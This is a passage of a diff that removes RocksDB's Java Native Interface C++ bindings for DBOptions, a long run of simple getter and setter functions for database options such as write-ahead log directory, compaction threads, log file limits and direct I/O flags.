-  env->ReleaseStringUTFChars(jwal_dir, wal_dir);
-}
-
-/*
- * Class:     org_rocksdb_DBOptions
- * Method:    walDir
- * Signature: (J)Ljava/lang/String
- */
-jstring Java_org_rocksdb_DBOptions_walDir(
-    JNIEnv* env, jobject jobj, jlong jhandle) {
-  return env->NewStringUTF(
-      reinterpret_cast<rocksdb::DBOptions*>(jhandle)->wal_dir.c_str());
-}
-
-/*
- * Class:     org_rocksdb_DBOptions
- * Method:    setDeleteObsoleteFilesPeriodMicros
- * Signature: (JJ)V
- */
-void Java_org_rocksdb_DBOptions_setDeleteObsoleteFilesPeriodMicros(
-    JNIEnv* env, jobject jobj, jlong jhandle, jlong micros) {
-  reinterpret_cast<rocksdb::DBOptions*>(jhandle)
-      ->delete_obsolete_files_period_micros =
-          static_cast<int64_t>(micros);
-}
-
-/*
- * Class:     org_rocksdb_DBOptions
- * Method:    deleteObsoleteFilesPeriodMicros
- * Signature: (J)J
- */
-jlong Java_org_rocksdb_DBOptions_deleteObsoleteFilesPeriodMicros(
-    JNIEnv* env, jobject jobj, jlong jhandle) {
-  return reinterpret_cast<rocksdb::DBOptions*>(jhandle)
-      ->delete_obsolete_files_period_micros;
-}
-
-/*
- * Class:     org_rocksdb_DBOptions
- * Method:    setBaseBackgroundCompactions
- * Signature: (JI)V
- */
-void Java_org_rocksdb_DBOptions_setBaseBackgroundCompactions(
-    JNIEnv* env, jobject jobj, jlong jhandle, jint max) {
-  reinterpret_cast<rocksdb::DBOptions*>(jhandle)
-      ->base_background_compactions = static_cast<int>(max);
-}
-
-/*
- * Class:     org_rocksdb_DBOptions
- * Method:    baseBackgroundCompactions
- * Signature: (J)I
- */
-jint Java_org_rocksdb_DBOptions_baseBackgroundCompactions(
-    JNIEnv* env, jobject jobj, jlong jhandle) {
-  return reinterpret_cast<rocksdb::DBOptions*>(jhandle)
-      ->base_background_compactions;
-}
-
-/*
- * Class:     org_rocksdb_DBOptions
- * Method:    setMaxBackgroundCompactions
- * Signature: (JI)V
- */
-void Java_org_rocksdb_DBOptions_setMaxBackgroundCompactions(
-    JNIEnv* env, jobject jobj, jlong jhandle, jint max) {
-  reinterpret_cast<rocksdb::DBOptions*>(jhandle)
-      ->max_background_compactions = static_cast<int>(max);
-}
-
-/*
- * Class:     org_rocksdb_DBOptions
- * Method:    maxBackgroundCompactions
- * Signature: (J)I
- */
-jint Java_org_rocksdb_DBOptions_maxBackgroundCompactions(
-    JNIEnv* env, jobject jobj, jlong jhandle) {
-  return reinterpret_cast<rocksdb::DBOptions*>(
-      jhandle)->max_background_compactions;
-}
-
-/*
- * Class:     org_rocksdb_DBOptions
- * Method:    setMaxSubcompactions
- * Signature: (JI)V
- */
-void Java_org_rocksdb_DBOptions_setMaxSubcompactions(
-    JNIEnv* env, jobject jobj, jlong jhandle, jint max) {
-  reinterpret_cast<rocksdb::DBOptions*>(jhandle)
-      ->max_subcompactions = static_cast<int32_t>(max);
-}
-
-/*
- * Class:     org_rocksdb_DBOptions
- * Method:    maxSubcompactions
- * Signature: (J)I
- */
-jint Java_org_rocksdb_DBOptions_maxSubcompactions(
-    JNIEnv* env, jobject jobj, jlong jhandle) {
-  return reinterpret_cast<rocksdb::DBOptions*>(jhandle)
-      ->max_subcompactions;
-}
-
-/*
- * Class:     org_rocksdb_DBOptions
- * Method:    setMaxBackgroundFlushes
- * Signature: (JI)V
- */
-void Java_org_rocksdb_DBOptions_setMaxBackgroundFlushes(
-    JNIEnv* env, jobject jobj, jlong jhandle, jint max_background_flushes) {
-  reinterpret_cast<rocksdb::DBOptions*>(jhandle)->max_background_flushes =
-      static_cast<int>(max_background_flushes);
-}
-
-/*
- * Class:     org_rocksdb_DBOptions
- * Method:    maxBackgroundFlushes
- * Signature: (J)I
- */
-jint Java_org_rocksdb_DBOptions_maxBackgroundFlushes(
-    JNIEnv* env, jobject jobj, jlong jhandle) {
-  return reinterpret_cast<rocksdb::DBOptions*>(jhandle)->
-      max_background_flushes;
-}
-
-/*
- * Class:     org_rocksdb_DBOptions
- * Method:    setMaxLogFileSize
- * Signature: (JJ)V
- */
-void Java_org_rocksdb_DBOptions_setMaxLogFileSize(
-    JNIEnv* env, jobject jobj, jlong jhandle, jlong max_log_file_size) {
-  rocksdb::Status s = rocksdb::check_if_jlong_fits_size_t(max_log_file_size);
-  if (s.ok()) {
-    reinterpret_cast<rocksdb::DBOptions*>(jhandle)->max_log_file_size =
-        max_log_file_size;
-  } else {
-    rocksdb::IllegalArgumentExceptionJni::ThrowNew(env, s);
-  }
-}
-
-/*
- * Class:     org_rocksdb_DBOptions
- * Method:    maxLogFileSize
- * Signature: (J)J
- */
-jlong Java_org_rocksdb_DBOptions_maxLogFileSize(
-    JNIEnv* env, jobject jobj, jlong jhandle) {
-  return reinterpret_cast<rocksdb::DBOptions*>(jhandle)->max_log_file_size;
-}
-
-/*
- * Class:     org_rocksdb_DBOptions
- * Method:    setLogFileTimeToRoll
- * Signature: (JJ)V
- */
-void Java_org_rocksdb_DBOptions_setLogFileTimeToRoll(
-    JNIEnv* env, jobject jobj, jlong jhandle, jlong log_file_time_to_roll) {
-  rocksdb::Status s = rocksdb::check_if_jlong_fits_size_t(
-      log_file_time_to_roll);
-  if (s.ok()) {
-    reinterpret_cast<rocksdb::DBOptions*>(jhandle)->log_file_time_to_roll =
-        log_file_time_to_roll;
-  } else {
-    rocksdb::IllegalArgumentExceptionJni::ThrowNew(env, s);
-  }
-}
-
-/*
- * Class:     org_rocksdb_DBOptions
- * Method:    logFileTimeToRoll
- * Signature: (J)J
- */
-jlong Java_org_rocksdb_DBOptions_logFileTimeToRoll(
-    JNIEnv* env, jobject jobj, jlong jhandle) {
-  return reinterpret_cast<rocksdb::DBOptions*>(jhandle)->log_file_time_to_roll;
-}
-
-/*
- * Class:     org_rocksdb_DBOptions
- * Method:    setKeepLogFileNum
- * Signature: (JJ)V
- */
-void Java_org_rocksdb_DBOptions_setKeepLogFileNum(
-    JNIEnv* env, jobject jobj, jlong jhandle, jlong keep_log_file_num) {
-  rocksdb::Status s = rocksdb::check_if_jlong_fits_size_t(keep_log_file_num);
-  if (s.ok()) {
-    reinterpret_cast<rocksdb::DBOptions*>(jhandle)->keep_log_file_num =
-        keep_log_file_num;
-  } else {
-    rocksdb::IllegalArgumentExceptionJni::ThrowNew(env, s);
-  }
-}
-
-/*
- * Class:     org_rocksdb_DBOptions
- * Method:    keepLogFileNum
- * Signature: (J)J
- */
-jlong Java_org_rocksdb_DBOptions_keepLogFileNum(
-    JNIEnv* env, jobject jobj, jlong jhandle) {
-  return reinterpret_cast<rocksdb::DBOptions*>(jhandle)->keep_log_file_num;
-}
-
-/*
- * Class:     org_rocksdb_DBOptions
- * Method:    setRecycleLogFileNum
- * Signature: (JJ)V
- */
-void Java_org_rocksdb_DBOptions_setRecycleLogFileNum(
-    JNIEnv* env, jobject jobj, jlong jhandle, jlong recycle_log_file_num) {
-  rocksdb::Status s = rocksdb::check_if_jlong_fits_size_t(recycle_log_file_num);
-  if (s.ok()) {
-    reinterpret_cast<rocksdb::DBOptions*>(jhandle)->recycle_log_file_num =
-        recycle_log_file_num;
-  } else {
-    rocksdb::IllegalArgumentExceptionJni::ThrowNew(env, s);
-  }
-}
-
-/*
- * Class:     org_rocksdb_DBOptions
- * Method:    recycleLogFileNum
- * Signature: (J)J
- */
-jlong Java_org_rocksdb_DBOptions_recycleLogFileNum(JNIEnv* env, jobject jobj,
-                                                   jlong jhandle) {
-  return reinterpret_cast<rocksdb::DBOptions*>(jhandle)->recycle_log_file_num;
-}
-
-/*
- * Class:     org_rocksdb_DBOptions
- * Method:    setMaxManifestFileSize
- * Signature: (JJ)V
- */
-void Java_org_rocksdb_DBOptions_setMaxManifestFileSize(
-    JNIEnv* env, jobject jobj, jlong jhandle, jlong max_manifest_file_size) {
-  reinterpret_cast<rocksdb::DBOptions*>(jhandle)->max_manifest_file_size =
-      static_cast<int64_t>(max_manifest_file_size);
-}
-
-/*
- * Class:     org_rocksdb_DBOptions
- * Method:    maxManifestFileSize
- * Signature: (J)J
- */
-jlong Java_org_rocksdb_DBOptions_maxManifestFileSize(
-    JNIEnv* env, jobject jobj, jlong jhandle) {
-  return reinterpret_cast<rocksdb::DBOptions*>(jhandle)->
-      max_manifest_file_size;
-}
-
-/*
- * Class:     org_rocksdb_DBOptions
- * Method:    setTableCacheNumshardbits
- * Signature: (JI)V
- */
-void Java_org_rocksdb_DBOptions_setTableCacheNumshardbits(
-    JNIEnv* env, jobject jobj, jlong jhandle, jint table_cache_numshardbits) {
-  reinterpret_cast<rocksdb::DBOptions*>(jhandle)->table_cache_numshardbits =
-      static_cast<int>(table_cache_numshardbits);
-}
-
-/*
- * Class:     org_rocksdb_DBOptions
- * Method:    tableCacheNumshardbits
- * Signature: (J)I
- */
-jint Java_org_rocksdb_DBOptions_tableCacheNumshardbits(
-    JNIEnv* env, jobject jobj, jlong jhandle) {
-  return reinterpret_cast<rocksdb::DBOptions*>(jhandle)->
-      table_cache_numshardbits;
-}
-
-/*
- * Class:     org_rocksdb_DBOptions
- * Method:    setWalTtlSeconds
- * Signature: (JJ)V
- */
-void Java_org_rocksdb_DBOptions_setWalTtlSeconds(
-    JNIEnv* env, jobject jobj, jlong jhandle, jlong WAL_ttl_seconds) {
-  reinterpret_cast<rocksdb::DBOptions*>(jhandle)->WAL_ttl_seconds =
-      static_cast<int64_t>(WAL_ttl_seconds);
-}
-
-/*
- * Class:     org_rocksdb_DBOptions
- * Method:    walTtlSeconds
- * Signature: (J)J
- */
-jlong Java_org_rocksdb_DBOptions_walTtlSeconds(
-    JNIEnv* env, jobject jobj, jlong jhandle) {
-  return reinterpret_cast<rocksdb::DBOptions*>(jhandle)->WAL_ttl_seconds;
-}
-
-/*
- * Class:     org_rocksdb_DBOptions
- * Method:    setWalSizeLimitMB
- * Signature: (JJ)V
- */
-void Java_org_rocksdb_DBOptions_setWalSizeLimitMB(
-    JNIEnv* env, jobject jobj, jlong jhandle, jlong WAL_size_limit_MB) {
-  reinterpret_cast<rocksdb::DBOptions*>(jhandle)->WAL_size_limit_MB =
-      static_cast<int64_t>(WAL_size_limit_MB);
-}
-
-/*
- * Class:     org_rocksdb_DBOptions
- * Method:    walTtlSeconds
- * Signature: (J)J
- */
-jlong Java_org_rocksdb_DBOptions_walSizeLimitMB(
-    JNIEnv* env, jobject jobj, jlong jhandle) {
-  return reinterpret_cast<rocksdb::DBOptions*>(jhandle)->WAL_size_limit_MB;
-}
-
-/*
- * Class:     org_rocksdb_DBOptions
- * Method:    setManifestPreallocationSize
- * Signature: (JJ)V
- */
-void Java_org_rocksdb_DBOptions_setManifestPreallocationSize(
-    JNIEnv* env, jobject jobj, jlong jhandle, jlong preallocation_size) {
-  rocksdb::Status s = rocksdb::check_if_jlong_fits_size_t(preallocation_size);
-  if (s.ok()) {
-    reinterpret_cast<rocksdb::DBOptions*>(jhandle)->
-        manifest_preallocation_size = preallocation_size;
-  } else {
-    rocksdb::IllegalArgumentExceptionJni::ThrowNew(env, s);
-  }
-}
-
-/*
- * Class:     org_rocksdb_DBOptions
- * Method:    manifestPreallocationSize
- * Signature: (J)J
- */
-jlong Java_org_rocksdb_DBOptions_manifestPreallocationSize(
-    JNIEnv* env, jobject jobj, jlong jhandle) {
-  return reinterpret_cast<rocksdb::DBOptions*>(jhandle)
-      ->manifest_preallocation_size;
-}
-
-/*
- * Class:     org_rocksdb_DBOptions
- * Method:    useDirectReads
- * Signature: (J)Z
- */
-jboolean Java_org_rocksdb_DBOptions_useDirectReads(JNIEnv* env, jobject jobj,
-                                                   jlong jhandle) {
-  return reinterpret_cast<rocksdb::DBOptions*>(jhandle)->use_direct_reads;
-}
-
-/*
- * Class:     org_rocksdb_DBOptions
- * Method:    setUseDirectReads
- * Signature: (JZ)V
- */
-void Java_org_rocksdb_DBOptions_setUseDirectReads(JNIEnv* env, jobject jobj,
-                                                  jlong jhandle,
-                                                  jboolean use_direct_reads) {
-  reinterpret_cast<rocksdb::DBOptions*>(jhandle)->use_direct_reads =
-      static_cast<bool>(use_direct_reads);
-}
-
-/*
- * Class:     org_rocksdb_DBOptions
- * Method:    useDirectIoForFlushAndCompaction
- * Signature: (J)Z
- */
-jboolean Java_org_rocksdb_DBOptions_useDirectIoForFlushAndCompaction(
-    JNIEnv* env, jobject jobj, jlong jhandle) {
-  return reinterpret_cast<rocksdb::DBOptions*>(jhandle)
-      ->use_direct_io_for_flush_and_compaction;
-}
-
-/*
- * Class:     org_rocksdb_DBOptions
- * Method:    setUseDirectReads
- * Signature: (JZ)V
- */
-void Java_org_rocksdb_DBOptions_setUseDirectIoForFlushAndCompaction(
-    JNIEnv* env, jobject jobj, jlong jhandle,
-    jboolean use_direct_io_for_flush_and_compaction) {
-  reinterpret_cast<rocksdb::DBOptions*>(jhandle)
-      ->use_direct_io_for_flush_and_compaction =
-      static_cast<bool>(use_direct_io_for_flush_and_compaction);
-}
-
-/*
- * Class:     org_rocksdb_DBOptions
- * Method:    setAllowFAllocate
- * Signature: (JZ)V
- */
-void Java_org_rocksdb_DBOptions_setAllowFAllocate(
-    JNIEnv* env, jobject jobj, jlong jhandle, jboolean jallow_fallocate) {
-  reinterpret_cast<rocksdb::DBOptions*>(jhandle)->allow_fallocate =
-      static_cast<bool>(jallow_fallocate);
-}
-
-/*
- * Class:     org_rocksdb_DBOptions
- * Method:    allowFAllocate
- * Signature: (J)Z
- */
-jboolean Java_org_rocksdb_DBOptions_allowFAllocate(
-    JNIEnv* env, jobject jobj, jlong jhandle) {
-  auto* opt = reinterpret_cast<rocksdb::DBOptions*>(jhandle);
-  return static_cast<jboolean>(opt->allow_fallocate);
-}
-
-/*
- * Class:     org_rocksdb_DBOptions
- * Method:    setAllowMmapReads
- * Signature: (JZ)V
- */
-void Java_org_rocksdb_DBOptions_setAllowMmapReads(
-    JNIEnv* env, jobject jobj, jlong jhandle, jboolean allow_mmap_reads) {
-  reinterpret_cast<rocksdb::DBOptions*>(jhandle)->allow_mmap_reads =
-      static_cast<bool>(allow_mmap_reads);
-}
-
-/*
- * Class:     org_rocksdb_DBOptions
- * Method:    allowMmapReads
- * Signature: (J)Z
- */
-jboolean Java_org_rocksdb_DBOptions_allowMmapReads(
-    JNIEnv* env, jobject jobj, jlong jhandle) {
-  return reinterpret_cast<rocksdb::DBOptions*>(jhandle)->allow_mmap_reads;
-}
-
-/*
- * Class:     org_rocksdb_DBOptions
- * Method:    setAllowMmapWrites
- * Signature: (JZ)V
- */
-void Java_org_rocksdb_DBOptions_setAllowMmapWrites(
-    JNIEnv* env, jobject jobj, jlong jhandle, jboolean allow_mmap_writes) {
-  reinterpret_cast<rocksdb::DBOptions*>(jhandle)->allow_mmap_writes =
-      static_cast<bool>(allow_mmap_writes);
-}
-
-/*
- * Class:     org_rocksdb_DBOptions
- * Method:    allowMmapWrites
- * Signature: (J)Z
- */
-jboolean Java_org_rocksdb_DBOptions_allowMmapWrites(
-    JNIEnv* env, jobject jobj, jlong jhandle) {
-  return reinterpret_cast<rocksdb::DBOptions*>(jhandle)->allow_mmap_writes;
-}
-
-/*
- * Class:     org_rocksdb_DBOptions
- * Method:    setIsFdCloseOnExec
- * Signature: (JZ)V
- */
-void Java_org_rocksdb_DBOptions_setIsFdCloseOnExec(
-    JNIEnv* env, jobject jobj, jlong jhandle, jboolean is_fd_close_on_exec) {
-  reinterpret_cast<rocksdb::DBOptions*>(jhandle)->is_fd_close_on_exec =
-      static_cast<bool>(is_fd_close_on_exec);
-}
-
-/*
- * Class:     org_rocksdb_DBOptions
- * Method:    isFdCloseOnExec
- * Signature: (J)Z
- */
-jboolean Java_org_rocksdb_DBOptions_isFdCloseOnExec(
-    JNIEnv* env, jobject jobj, jlong jhandle) {
-  return reinterpret_cast<rocksdb::DBOptions*>(jhandle)->is_fd_close_on_exec;
-}
-
-/*
- * Class:     org_rocksdb_DBOptions
- * Method:    setStatsDumpPeriodSec
- * Signature: (JI)V
- */
-void Java_org_rocksdb_DBOptions_setStatsDumpPeriodSec(
-    JNIEnv* env, jobject jobj, jlong jhandle, jint stats_dump_period_sec) {
-  reinterpret_cast<rocksdb::DBOptions*>(jhandle)->stats_dump_period_sec =
-      static_cast<int>(stats_dump_period_sec);
-}
-
-/*
- * Class:     org_rocksdb_DBOptions
- * Method:    statsDumpPeriodSec
- * Signature: (J)I
- */
-jint Java_org_rocksdb_DBOptions_statsDumpPeriodSec(
-    JNIEnv* env, jobject jobj, jlong jhandle) {
-  return reinterpret_cast<rocksdb::DBOptions*>(jhandle)->stats_dump_period_sec;
-}
-
-/*
- * Class:     org_rocksdb_DBOptions
- * Method:    setAdviseRandomOnOpen
- * Signature: (JZ)V
- */
-void Java_org_rocksdb_DBOptions_setAdviseRandomOnOpen(
-    JNIEnv* env, jobject jobj, jlong jhandle, jboolean advise_random_on_open) {
-  reinterpret_cast<rocksdb::DBOptions*>(jhandle)->advise_random_on_open =
-      static_cast<bool>(advise_random_on_open);
-}
-
-/*
- * Class:     org_rocksdb_DBOptions
- * Method:    adviseRandomOnOpen
- * Signature: (J)Z
- */
-jboolean Java_org_rocksdb_DBOptions_adviseRandomOnOpen(
-    JNIEnv* env, jobject jobj, jlong jhandle) {
-  return reinterpret_cast<rocksdb::DBOptions*>(jhandle)->advise_random_on_open;
-}
-
-/*
- * Class:     org_rocksdb_DBOptions
- * Method:    setDbWriteBufferSize
- * Signature: (JJ)V
- */
-void Java_org_rocksdb_DBOptions_setDbWriteBufferSize(
-    JNIEnv* env, jobject jobj, jlong jhandle, jlong jdb_write_buffer_size) {
-  auto* opt = reinterpret_cast<rocksdb::DBOptions*>(jhandle);
-  opt->db_write_buffer_size = static_cast<size_t>(jdb_write_buffer_size);
-}
-
-/*
- * Class:     org_rocksdb_DBOptions
- * Method:    dbWriteBufferSize
- * Signature: (J)J
- */
-jlong Java_org_rocksdb_DBOptions_dbWriteBufferSize(
-    JNIEnv* env, jobject jobj, jlong jhandle) {
-  auto* opt = reinterpret_cast<rocksdb::DBOptions*>(jhandle);
-  return static_cast<jlong>(opt->db_write_buffer_size);
-}
-
-/*
- * Class:     org_rocksdb_DBOptions
- * Method:    setAccessHintOnCompactionStart
- * Signature: (JB)V
- */
-void Java_org_rocksdb_DBOptions_setAccessHintOnCompactionStart(
-    JNIEnv* env, jobject jobj, jlong jhandle, jbyte jaccess_hint_value) {
-  auto* opt = reinterpret_cast<rocksdb::DBOptions*>(jhandle);
-  opt->access_hint_on_compaction_start =
-      rocksdb::AccessHintJni::toCppAccessHint(jaccess_hint_value);
-}
-
-/*
- * Class:     org_rocksdb_DBOptions
- * Method:    accessHintOnCompactionStart
- * Signature: (J)B
- */
-jbyte Java_org_rocksdb_DBOptions_accessHintOnCompactionStart(
-    JNIEnv* env, jobject jobj, jlong jhandle) {
-  auto* opt = reinterpret_cast<rocksdb::DBOptions*>(jhandle);
-  return rocksdb::AccessHintJni::toJavaAccessHint(
-      opt->access_hint_on_compaction_start);
-}
-
-/*
- * Class:     org_rocksdb_DBOptions
- * Method:    setNewTableReaderForCompactionInputs
- * Signature: (JZ)V
- */
-void Java_org_rocksdb_DBOptions_setNewTableReaderForCompactionInputs(
-    JNIEnv* env, jobject jobj, jlong jhandle,
-    jboolean jnew_table_reader_for_compaction_inputs) {
-  auto* opt = reinterpret_cast<rocksdb::DBOptions*>(jhandle);
-  opt->new_table_reader_for_compaction_inputs =
-      static_cast<bool>(jnew_table_reader_for_compaction_inputs);
-}
-
-/*
- * Class:     org_rocksdb_DBOptions
- * Method:    newTableReaderForCompactionInputs
- * Signature: (J)Z
- */
-jboolean Java_org_rocksdb_DBOptions_newTableReaderForCompactionInputs(
-    JNIEnv* env, jobject jobj, jlong jhandle) {
-  auto* opt = reinterpret_cast<rocksdb::DBOptions*>(jhandle);
-  return static_cast<bool>(opt->new_table_reader_for_compaction_inputs);
-}
-
-/*
- * Class:     org_rocksdb_DBOptions
- * Method:    setCompactionReadaheadSize
- * Signature: (JJ)V
- */
-void Java_org_rocksdb_DBOptions_setCompactionReadaheadSize(
-    JNIEnv* env, jobject jobj, jlong jhandle, jlong jcompaction_readahead_size) {
-  auto* opt = reinterpret_cast<rocksdb::DBOptions*>(jhandle);
-  opt->compaction_readahead_size =
-      static_cast<size_t>(jcompaction_readahead_size);
-}
-
-/*
- * Class:     org_rocksdb_DBOptions
- * Method:    compactionReadaheadSize
- * Signature: (J)J
- */
-jlong Java_org_rocksdb_DBOptions_compactionReadaheadSize(
-    JNIEnv* env, jobject jobj, jlong jhandle) {
-  auto* opt = reinterpret_cast<rocksdb::DBOptions*>(jhandle);
-  return static_cast<jlong>(opt->compaction_readahead_size);
-}
-
-/*
- * Class:     org_rocksdb_DBOptions
- * Method:    setRandomAccessMaxBufferSize
- * Signature: (JJ)V
- */
-void Java_org_rocksdb_DBOptions_setRandomAccessMaxBufferSize(
-    JNIEnv* env, jobject jobj, jlong jhandle,
-    jlong jrandom_access_max_buffer_size) {
-  auto* opt = reinterpret_cast<rocksdb::DBOptions*>(jhandle);
-  opt->random_access_max_buffer_size =
-      static_cast<size_t>(jrandom_access_max_buffer_size);
-}
-
-/*
- * Class:     org_rocksdb_DBOptions
- * Method:    randomAccessMaxBufferSize
- * Signature: (J)J
- */
-jlong Java_org_rocksdb_DBOptions_randomAccessMaxBufferSize(
-    JNIEnv* env, jobject jobj, jlong jhandle) {
-  auto* opt = reinterpret_cast<rocksdb::DBOptions*>(jhandle);
-  return static_cast<jlong>(opt->random_access_max_buffer_size);
-}
-
-/*
- * Class:     org_rocksdb_DBOptions
- * Method:    setWritableFileMaxBufferSize
- * Signature: (JJ)V
- */
-void Java_org_rocksdb_DBOptions_setWritableFileMaxBufferSize(
-    JNIEnv* env, jobject jobj, jlong jhandle,
-    jlong jwritable_file_max_buffer_size) {
-  auto* opt = reinterpret_cast<rocksdb::DBOptions*>(jhandle);
-  opt->writable_file_max_buffer_size =
-      static_cast<size_t>(jwritable_file_max_buffer_size);
-}
-
-/*
- * Class:     org_rocksdb_DBOptions
- * Method:    writableFileMaxBufferSize
- * Signature: (J)J
- */
-jlong Java_org_rocksdb_DBOptions_writableFileMaxBufferSize(
-    JNIEnv* env, jobject jobj, jlong jhandle) {
-  auto* opt = reinterpret_cast<rocksdb::DBOptions*>(jhandle);
-  return static_cast<jlong>(opt->writable_file_max_buffer_size);
-}
-
-/*
- * Class:     org_rocksdb_DBOptions
- * Method:    setUseAdaptiveMutex
- * Signature: (JZ)V
- */
-void Java_org_rocksdb_DBOptions_setUseAdaptiveMutex(
-    JNIEnv* env, jobject jobj, jlong jhandle, jboolean use_adaptive_mutex) {
-  reinterpret_cast<rocksdb::DBOptions*>(jhandle)->use_adaptive_mutex =
-      static_cast<bool>(use_adaptive_mutex);
-}
-
-/*
- * Class:     org_rocksdb_DBOptions
- * Method:    useAdaptiveMutex
- * Signature: (J)Z
- */
-jboolean Java_org_rocksdb_DBOptions_useAdaptiveMutex(
-    JNIEnv* env, jobject jobj, jlong jhandle) {
-  return reinterpret_cast<rocksdb::DBOptions*>(jhandle)->use_adaptive_mutex;
-}
-
-/*
- * Class:     org_rocksdb_DBOptions
- * Method:    setBytesPerSync
- * Signature: (JJ)V
- */
-void Java_org_rocksdb_DBOptions_setBytesPerSync(
-    JNIEnv* env, jobject jobj, jlong jhandle, jlong bytes_per_sync) {
-  reinterpret_cast<rocksdb::DBOptions*>(jhandle)->bytes_per_sync =
-      static_cast<int64_t>(bytes_per_sync);
-}
-
-/*
- * Class:     org_rocksdb_DBOptions
- * Method:    bytesPerSync
- * Signature: (J)J
- */
-jlong Java_org_rocksdb_DBOptions_bytesPerSync(
-    JNIEnv* env, jobject jobj, jlong jhandle) {
-  return reinterpret_cast<rocksdb::DBOptions*>(jhandle)->bytes_per_sync;
-}
-
-/*
- * Class:     org_rocksdb_DBOptions
- * Method:    setWalBytesPerSync
- * Signature: (JJ)V
- */
-void Java_org_rocksdb_DBOptions_setWalBytesPerSync(
-    JNIEnv* env, jobject jobj, jlong jhandle, jlong jwal_bytes_per_sync) {
-  reinterpret_cast<rocksdb::DBOptions*>(jhandle)->wal_bytes_per_sync =
-      static_cast<int64_t>(jwal_bytes_per_sync);
-}
-
-/*
- * Class:     org_rocksdb_DBOptions
- * Method:    walBytesPerSync
- * Signature: (J)J
- */
-jlong Java_org_rocksdb_DBOptions_walBytesPerSync(
-    JNIEnv* env, jobject jobj, jlong jhandle) {
-  auto* opt = reinterpret_cast<rocksdb::DBOptions*>(jhandle);
-  return static_cast<jlong>(opt->wal_bytes_per_sync);
-}
-
-/*
- * Class:     org_rocksdb_DBOptions
- * Method:    setEnableThreadTracking
- * Signature: (JZ)V
- */
-void Java_org_rocksdb_DBOptions_setEnableThreadTracking(
-    JNIEnv* env, jobject jobj, jlong jhandle,
-    jboolean jenable_thread_tracking) {
-  auto* opt = reinterpret_cast<rocksdb::DBOptions*>(jhandle);
-  opt->enable_thread_tracking = static_cast<bool>(jenable_thread_tracking);
-}
-
-/*
- * Class:     org_rocksdb_DBOptions
- * Method:    enableThreadTracking
- * Signature: (J)Z
- */
-jboolean Java_org_rocksdb_DBOptions_enableThreadTracking(
-    JNIEnv* env, jobject jobj, jlong jhandle) {
-  auto* opt = reinterpret_cast<rocksdb::DBOptions*>(jhandle);
-  return static_cast<jboolean>(opt->enable_thread_tracking);
-}
-
-/*
- * Class:     org_rocksdb_DBOptions
- * Method:    setDelayedWriteRate
- * Signature: (JJ)V
- */
-void Java_org_rocksdb_DBOptions_setDelayedWriteRate(
-    JNIEnv* env, jobject jobj, jlong jhandle, jlong jdelayed_write_rate) {
-  auto* opt = reinterpret_cast<rocksdb::DBOptions*>(jhandle);
-  opt->delayed_write_rate = static_cast<uint64_t>(jdelayed_write_rate);
-}
-
-/*
- * Class:     org_rocksdb_DBOptions
- * Method:    delayedWriteRate
- * Signature: (J)J
- */
-jlong Java_org_rocksdb_DBOptions_delayedWriteRate(
-    JNIEnv* env, jobject jobj, jlong jhandle) {
-  auto* opt = reinterpret_cast<rocksdb::DBOptions*>(jhandle);
-  return static_cast<jlong>(opt->delayed_write_rate);
-}
-
-/*
- * Class:     org_rocksdb_DBOptions
- * Method:    setAllowConcurrentMemtableWrite
- * Signature: (JZ)V
- */
-void Java_org_rocksdb_DBOptions_setAllowConcurrentMemtableWrite(
-    JNIEnv* env, jobject jobj, jlong jhandle, jboolean allow) {
-  reinterpret_cast<rocksdb::DBOptions*>(jhandle)->
-      allow_concurrent_memtable_write = static_cast<bool>(allow);
-}
-
-/*
- * Class:     org_rocksdb_DBOptions
- * Method:    allowConcurrentMemtableWrite
- * Signature: (J)Z
- */
-jboolean Java_org_rocksdb_DBOptions_allowConcurrentMemtableWrite(
-    JNIEnv* env, jobject jobj, jlong jhandle) {
-  return reinterpret_cast<rocksdb::DBOptions*>(jhandle)->
-      allow_concurrent_memtable_write;
-}
-
-/*
- * Class:     org_rocksdb_DBOptions
- * Method:    setEnableWriteThreadAdaptiveYield
- * Signature: (JZ)V
- */
-void Java_org_rocksdb_DBOptions_setEnableWriteThreadAdaptiveYield(
-    JNIEnv* env, jobject jobj, jlong jhandle, jboolean yield) {
-  reinterpret_cast<rocksdb::DBOptions*>(jhandle)->
-      enable_write_thread_adaptive_yield = static_cast<bool>(yield);
-}
-
-/*
- * Class:     org_rocksdb_DBOptions
- * Method:    enableWriteThreadAdaptiveYield
- * Signature: (J)Z
- */
-jboolean Java_org_rocksdb_DBOptions_enableWriteThreadAdaptiveYield(
-    JNIEnv* env, jobject jobj, jlong jhandle) {
-  return reinterpret_cast<rocksdb::DBOptions*>(jhandle)->
-      enable_write_thread_adaptive_yield;
-}
-
-/*
- * Class:     org_rocksdb_DBOptions
- * Method:    setWriteThreadMaxYieldUsec
- * Signature: (JJ)V
- */
-void Java_org_rocksdb_DBOptions_setWriteThreadMaxYieldUsec(
-    JNIEnv* env, jobject jobj, jlong jhandle, jlong max) {
-  reinterpret_cast<rocksdb::DBOptions*>(jhandle)->
-      write_thread_max_yield_usec = static_cast<int64_t>(max);
-}
-
-/*
- * Class:     org_rocksdb_DBOptions
- * Method:    writeThreadMaxYieldUsec
- * Signature: (J)J
- */
-jlong Java_org_rocksdb_DBOptions_writeThreadMaxYieldUsec(
-    JNIEnv* env, jobject jobj, jlong jhandle) {
-  return reinterpret_cast<rocksdb::DBOptions*>(jhandle)->
-      write_thread_max_yield_usec;
-}
-
-/*
- * Class:     org_rocksdb_DBOptions
- * Method:    setWriteThreadSlowYieldUsec
- * Signature: (JJ)V
- */
-void Java_org_rocksdb_DBOptions_setWriteThreadSlowYieldUsec(
-    JNIEnv* env, jobject jobj, jlong jhandle, jlong slow) {
-  reinterpret_cast<rocksdb::DBOptions*>(jhandle)->
-      write_thread_slow_yield_usec = static_cast<int64_t>(slow);
-}
-
-/*
- * Class:     org_rocksdb_DBOptions
- * Method:    writeThreadSlowYieldUsec
- * Signature: (J)J
- */
-jlong Java_org_rocksdb_DBOptions_writeThreadSlowYieldUsec(
-    JNIEnv* env, jobject jobj, jlong jhandle) {
-  return reinterpret_cast<rocksdb::DBOptions*>(jhandle)->
-      write_thread_slow_yield_usec;
-}
-
-/*
- * Class:     org_rocksdb_DBOptions
- * Method:    setSkipStatsUpdateOnDbOpen
- * Signature: (JZ)V
- */
-void Java_org_rocksdb_DBOptions_setSkipStatsUpdateOnDbOpen(
-    JNIEnv* env, jobject jobj, jlong jhandle,
-    jboolean jskip_stats_update_on_db_open) {
-  auto* opt = reinterpret_cast<rocksdb::DBOptions*>(jhandle);
-  opt->skip_stats_update_on_db_open =
-      static_cast<bool>(jskip_stats_update_on_db_open);
-}
-
-/*
- * Class:     org_rocksdb_DBOptions
